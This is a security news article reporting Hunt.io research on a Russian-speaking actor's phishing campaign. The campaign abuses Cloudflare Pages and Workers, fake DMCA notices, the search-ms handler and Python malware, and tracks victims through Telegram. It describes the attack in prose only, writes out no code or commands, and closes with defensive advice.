A sophisticated phishing campaign orchestrated by a Russian-speaking threat actor has been uncovered, revealing the abuse of Cloudflare services and Telegram for malicious purposes.
Researchers at Hunt.io have identified this new wave of attacks, which employs Cloudflare-branded phishing pages and advanced tactics to evade detection.
The campaign utilizes Cloudflare’s Pages.dev and Workers.dev platforms typically used for legitimate static website hosting and serverless JavaScript execution to deliver phishing lures.
.png
)
These phishing pages impersonate Digital Millennium Copyright Act (DMCA) takedown notices, pressuring victims into downloading malicious files disguised as PDFs.
The attackers exploit the “search-ms” protocol to initiate downloads of Windows shortcut (.lnk) files that trigger a malware infection chain upon execution.
Phishing Infrastructure and Infection Chain
The phishing lures direct victims to domains hosted on Cloudflare infrastructure, such as “pages.dev” and “workers.dev,” where clicking on a “Get Document” button initiates the infection process.
The malicious .lnk file, disguised as a PDF, executes a PowerShell script that downloads additional payloads from an open directory hosted on a compromised server.
This includes a ZIP archive containing Python-based malware and a legitimate Python executable.
Once extracted, the malware establishes persistence by creating shortcuts in the Windows startup folder and communicates with Pyramid Command-and-Control (C2) servers.
Researchers noted incremental changes in the malware’s delivery mechanism, including obfuscation techniques to frustrate analysis.
For instance, configuration data in the Python script is now encoded with additional junk characters before being decoded.
Despite these modifications, the overall infection logic remains consistent with earlier campaigns linked to the same actor.
Telegram Integration for Enhanced Targeting
A notable evolution in this campaign is the integration of Telegram for victim tracking.
The malware uses a PowerShell script to send the external IP address of infected hosts to an attacker-operated Telegram bot.
This is achieved via hardcoded bot tokens and chat IDs embedded in the script.
The Telegram group associated with this activity, titled “ПШ КОД ЗАПУСК” (translated as “PS CODE LAUNCH”), appears to coordinate operations among several members, including an administrator and bot operator.
Despite their technical sophistication, the attackers continue to exhibit operational security (OPSEC) lapses, such as leaving open directories exposed on their servers.
These directories reveal details about their infrastructure and malware components, enabling researchers to map their activities.
Over 20 domains leveraging these open directories have been identified, further exposing the scale of the operation.
This campaign underscores the abuse of trusted services like Cloudflare and Telegram by cybercriminals to mask their operations and evade detection.
The use of legitimate platforms not only lends credibility to phishing pages but also complicates efforts to identify malicious activity.
Additionally, the exploitation of protocol handlers like “search-ms” highlights gaps in endpoint monitoring that attackers continue to exploit.
Security teams are advised to monitor for signs of abuse involving Cloudflare domains and protocol handlers while remaining vigilant against open directories serving malicious payloads.
Integrating DevOps Security practices can further strengthen detection and response capabilities, especially in monitoring CI/CD pipelines and infrastructure configurations.
Enhanced scrutiny of Telegram-based communications may also aid in identifying emerging threats.
As this threat actor evolves its tactics, organizations must adapt their defenses accordingly to mitigate risks posed by increasingly sophisticated phishing campaigns.
Find this News Interesting! Follow us on Google News, LinkedIn, & X to Get Instant Updates!
